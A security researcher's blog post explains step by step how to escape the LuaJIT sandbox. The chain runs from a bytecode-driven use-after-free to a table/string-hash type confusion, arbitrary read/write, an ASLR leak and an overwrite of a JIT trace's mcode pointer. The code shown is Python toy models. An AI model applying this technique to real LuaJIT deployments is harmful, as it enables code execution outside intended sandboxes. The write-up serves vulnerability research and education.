Happy holidays 🕎/🎅 and (almost) happy new year!
This week I presented my LuaJIT journey at the DEFCON-Groups meetup(@dc9723):
Yesterday I shared my LuaJIT journey at @dc9723 group. Thanks for everyone who attended :D Currently working on the last blogpost of the series, which documents the exploit dev part+the thinking process behind every step I showed in the slides. Should be published soon pic.twitter.com/pKIXzSuVFI
The slides included a summary of the 3-part blog series I published on this blog. However, there was a 4th part that I hadn’t published here yet and that was included in the presentation. So, here it is, part 4: Crafting a fully-weaponized sandbox escape for LuaJIT! :D
Side-Note: The talk was not recorded and I haven’t published the slides (yet, sorry). However, this blogpost is a great summary of the entire talk, and it documents some of the technical stuff in more depth.
Exploit plan
The plan is as follows:
JIT-Spray your shellcode (explained in part 3 of this series).
Achieve Use-After-Free
Leverage the UAF to get a Type-Confusion
Get leaks: Defeat ASLR
Find GCtrace->mcode pointer, overwrite its value
Jump to shellcode
Let’s go!
Use-After-Free
By default, Lua(JIT) allows you to load already-compiled Lua bytecode. This bytecode is not verified, as it is considered ‘trusted’, and you can cook a lot of powerful primitives by loading specially-crafted bytecode. Previously, this mechanism was researched by Samuel Groß (@5aelo, Project Zero) in this writeup. In his blogpost, Samuel demonstrates how to leverage the LOADK instruction of Lua to load a forged TValue. It involved some (slightly odd) heap shaping which I found difficult to reproduce in LuaJIT. Plus, I wanted to come up with my own strategy/exploit, so I decided to go for a MOV exploit.
In order to achieve UAF with a MOV instruction we:
Create a table (e.g. local tbl = {1337, 'foo', 'bar'})
MOV its TValue outside the virtual stack frame
Set it to nil to make the GCtab object unreachable from the GC root
Call collectgarbage()
And now we have a TValue on the virtual stack, pointing to a free’d GCtab object.
The reason we get a UAF out of the steps above is the way the Garbage Collector decides which memory to free: LuaJIT’s GC (which is based on Lua 5.1) uses a Tri-Color Mark-and-Sweep algorithm. Essentially, whenever the GC traverses the objects and marks them as grey/black, it scans through the virtual stack, starting from the bottom (lua_State::stack) all the way to the top of the stack (lua_State::top).
Hence, if we MOV a TValue outside of the stack (above L->top) and trigger the garbage collector (using collectgarbage()), the GCtab object pointed to by this TValue will never get marked ➜ as a result, it will be free’d during the sweep phase.
What the Garbage Collector doesn’t know is that we have another copy of this TValue, waiting for us to move it back to our Lua context after the GC collection ends :) And that’s the logic behind how to achieve UAF with MOV.
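To make the marking argument concrete, here is a minimal Python toy model. It is not LuaJIT's collector: the ToyVM class, its fields and the slot numbers are all made up for illustration. The only thing it keeps from the description above is that the mark phase treats the slots between the stack bottom and top as roots, and the sweep frees everything else.

```python
# Toy model only: NOT LuaJIT's GC, just the "roots are the slots below top" idea.
# ToyVM and all of its members are hypothetical names.

class ToyVM:
    def __init__(self, stack_size=8):
        self.heap = {}                     # object id -> payload (live allocations)
        self.stack = [None] * stack_size   # virtual stack slots holding object ids
        self.top = 0                       # slots at index >= top are outside the frame
        self._next_id = 1

    def alloc(self, payload):
        obj_id = self._next_id
        self._next_id += 1
        self.heap[obj_id] = payload
        return obj_id

    def collect(self):
        # Mark: only slots in [0, top) are scanned.
        marked = {ref for ref in self.stack[:self.top] if ref is not None}
        # Sweep: every unmarked object is freed.
        for obj_id in list(self.heap):
            if obj_id not in marked:
                del self.heap[obj_id]


def demo():
    vm = ToyVM()
    tbl = vm.alloc([1337, "foo", "bar"])
    vm.stack[0] = tbl            # local tbl = {...}
    vm.top = 1
    vm.stack[5] = vm.stack[0]    # "MOV" a copy to a slot above top
    vm.stack[0] = None           # tbl = nil
    vm.collect()                 # collectgarbage()
    dangling = vm.stack[5]       # the copy survived, the object did not
    return dangling, dangling in vm.heap
```

In this model, demo() hands back a reference whose target is no longer in the heap, which is the toy equivalent of the dangling TValue.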
At this point, the TValue is outside of the stack so we don’t have access to it in the context of our Lua script, but it shouldn’t be a problem to get it back to our script: we’ll just use RET <Our_TValue_idx>. This is exactly what exp-gen.py does when we prepare our exploit.
Type Confusion
The road to a Type-Confusion was a bit difficult and required some fancy engineering, as it was hard to find the right structures to overlap. But eventually I got it.
Before we get into the details, let’s set a goal: Our goal is to get a Lua table of type GCtab with a very large size(GCtab::asize) in order to get OOB r/w, and from there we’ll build our way up to a full code execution.
The data structures I chose to confuse are GCtab and the array of pointers pointed to by global_State::strhash. But before we dive into this, we’ll need to know what global_State::strhash is used for and what exactly String Interning is.
Some Background on String Interning
LuaJIT implements String Interning:
In computer science, string interning is a method of storing only one copy of each distinct string value, which must be immutable. Interning strings makes some string processing tasks more time- or space-efficient at the cost of requiring more time when the string is created or interned. The distinct values are stored in a string intern pool. (Source: wikipedia)
In other words, LuaJIT maintains a hash-table pointed by global_State::strhash. This hash-table contains all of the string objects(GCstr) of a Lua program.
Every time a new string allocation request is made, a hash is calculated in order to determine whether this string has been already interned or not:
However, if the string is unique (i.e. it does not already exist in the hash-table), a new allocation will be made. The interesting part here is what happens after the allocation of the new GCstr object:
If the string hash-table has become too full, it is resized, which relocates it to a new allocation. This part caught my attention, and led me to the creation of the final, successful Type-Confusion PoC (below).
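The lookup-then-grow behaviour described above can be sketched with a small Python toy. Everything in it is an assumption made for illustration: the ToyInternTable class, the FNV-1a stand-in hash (not LuaJIT's string hash) and the exact growth threshold. It only shows the general shape: hash the string, look for an existing copy, otherwise store it, and rebuild the bucket array once it gets too full.

```python
# Toy intern pool: a sketch of the idea, not LuaJIT's lj_str.c.
# ToyInternTable, toy_hash and the growth rule are illustrative assumptions.

class ToyInternTable:
    def __init__(self, size=4):
        self.mask = size - 1                       # size must be a power of two
        self.buckets = [[] for _ in range(size)]   # stands in for the strhash array
        self.count = 0
        self.relocations = 0                       # how many times the array was rebuilt

    @staticmethod
    def toy_hash(s):
        # 32-bit FNV-1a as a stand-in hash function.
        h = 0x811C9DC5
        for b in s.encode():
            h = ((h ^ b) * 0x01000193) & 0xFFFFFFFF
        return h

    def intern(self, s):
        chain = self.buckets[self.toy_hash(s) & self.mask]
        for existing in chain:
            if existing == s:
                return existing                    # already interned: reuse the stored copy
        chain.append(s)                            # new string: "allocate" it
        self.count += 1
        if self.count > self.mask:                 # table too full: grow it
            self._resize((self.mask << 1) + 1)
        return s

    def _resize(self, new_mask):
        # A fresh bucket array is built and every string is re-slotted into it,
        # so the old array is abandoned (the "relocation").
        new_buckets = [[] for _ in range(new_mask + 1)]
        for chain in self.buckets:
            for s in chain:
                new_buckets[self.toy_hash(s) & new_mask].append(s)
        self.buckets = new_buckets
        self.mask = new_mask
        self.relocations += 1
```

The point to take away is that a resize produces a brand new array whose slot contents are decided purely by the hashes of the strings that exist at that moment.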
Hash-table hacking
In order to create an overlap/type-confusion between the global_State::strhash hash-table and the UAF’d GCtab object we have to do the following steps:
And in order to populate the GCtab::asize field (which determines how big the array part of the Lua table is) we’ll need to occupy the 6th index of the global_State::strhash hash-table. To do that, I made a tiny C program that brute-forces possible options:
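The original C program is not reproduced here. As a rough sketch of the same brute-force idea in Python: enumerate short candidate strings, hash each one, and keep those whose hash masked by the table size equals the wanted slot. The toy_hash function below is a 32-bit FNV-1a stand-in and is NOT LuaJIT's string hash, and find_strings_for_slot and its parameters are hypothetical, so the strings it finds are only valid for this toy and cannot be used in a real exploit.

```python
import itertools
import string


def toy_hash(s):
    # Stand-in hash (32-bit FNV-1a). An assumption for illustration only;
    # a real brute-forcer would have to reimplement LuaJIT's own hash.
    h = 0x811C9DC5
    for b in s.encode():
        h = ((h ^ b) * 0x01000193) & 0xFFFFFFFF
    return h


def find_strings_for_slot(target_slot, table_mask, length=3, limit=5):
    """Return up to `limit` lowercase strings that land in `target_slot`."""
    hits = []
    for chars in itertools.product(string.ascii_lowercase, repeat=length):
        candidate = "".join(chars)
        # Same slot computation as a power-of-two hash table: hash & mask.
        if toy_hash(candidate) & table_mask == target_slot:
            hits.append(candidate)
            if len(hits) == limit:
                break
    return hits


if __name__ == "__main__":
    # Slot 6 of a hypothetical 256-entry table.
    print(find_strings_for_slot(6, 0xFF))
```

Note that the mask has to be the one the table will have after the relocation, since that is when the slot is decided.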
All we need is to add one of those strings as a constant in our exploit script, and during the hash-table relocation, it will fall right on the 6th index:
Nice! The 6th index is occupied, which gives the asize field a very large value:
Plus, the GCtab::array field is a Null pointer, so every array access is dereferenced relative to address 0x0. But hey, wait, if we’re starting from 0x0 that’s not a relative r/w, that’s an arbitrary r/w! To put it more clearly: if we print(uaf_tbl[0x40000000]), the LuaJIT interpreter will print out the value stored at address 0x40000000 multiplied by 8 (each array slot is an 8-byte TValue). That’s not an issue: to read a given address we’ll just divide it by 8 and use the result as the index, which cancels the multiplication.
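The index arithmetic can be written down as a tiny Python helper. This is a sketch under two assumptions taken from the paragraph above: slots are 8 bytes wide, and the array base is 0x0. The function names are made up.

```python
TVALUE_SIZE = 8  # assumption: 8 bytes per array slot, per the "multiplied by 8" above


def index_for_address(addr, array_base=0):
    """Table index whose slot sits at `addr`, for an array starting at `array_base`."""
    offset = addr - array_base
    if offset < 0 or offset % TVALUE_SIZE != 0:
        raise ValueError("address must be 8-byte aligned and not below the array base")
    return offset // TVALUE_SIZE


def address_for_index(index, array_base=0):
    """Address that indexing the confused table with `index` would touch."""
    return array_base + index * TVALUE_SIZE
```

For example, address_for_index(0x40000000) is 0x200000000, and reading address 0x40000000 itself needs index_for_address(0x40000000), i.e. index 0x8000000. Only 8-byte aligned addresses are reachable this way.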
Defeating ASLR
I’ll just paste here a screenshot from the presentation, because it really explains everything in a simple way:
Note: here I chose to leak the address of the require() function, but you can do it on any other built-in function that has a GCfuncC object.
Find the mcode pointer
In order to find the GCtrace::mcode pointer on the heap, we’ll need to find the GG_State structure on the heap:
This state object holds a function pointer to lj_alloc_f at g.allocf and, a few fields after it, the J.trace pointer, which points to an array that stores all of the GCtrace objects of our program (i.e. the JITed traces).
Using our leaks + arbitrary r/w primitive:
Calculate the address of lj_alloc_f
Scan through the heap in order to find this value
The moment we find it, it means we found g.allocf
Add a fixed offset of +0x308(it’s fixed because they are both part of the same GG_State structure) to reach the J.trace pointer.
Access our JITed trace object → overwrite its mcode value → win!
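The scan itself is simple enough to model offline. The Python sketch below runs over a byte buffer instead of a live process, and assumes 8-byte little-endian pointers stored at 8-byte aligned positions. The helper names are hypothetical, and the 0x308 constant is the offset quoted above for this particular build, so treat it as build-specific.

```python
import struct

J_TRACE_OFFSET = 0x308  # offset quoted in the post; assume it differs on other builds


def find_pointer(memory, base_addr, value):
    """Scan `memory` (bytes mapped at `base_addr`) for an aligned 64-bit pointer."""
    needle = struct.pack("<Q", value)   # assumption: little-endian, 8-byte pointers
    data = bytes(memory)
    for off in range(0, len(data) - 7, 8):
        if data[off:off + 8] == needle:
            return base_addr + off
    return None


def locate_j_trace_slot(memory, base_addr, lj_alloc_f_addr):
    """Address of the J.trace pointer, derived from where g.allocf was found."""
    allocf_slot = find_pointer(memory, base_addr, lj_alloc_f_addr)
    if allocf_slot is None:
        return None
    return allocf_slot + J_TRACE_OFFSET
```

In the real exploit the "memory" reads go through the arbitrary r/w primitive rather than a Python buffer, and the first match should be sanity-checked, since the same pointer value could in principle appear elsewhere on the heap.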
It was a great journey :D This is the 2nd time I’ve researched language interpreter internals (the 1st time was my Zend Engine research). At this point, I think I’m ready to face my all-time nemesis: Browsers! Stay tuned, and wish me luck.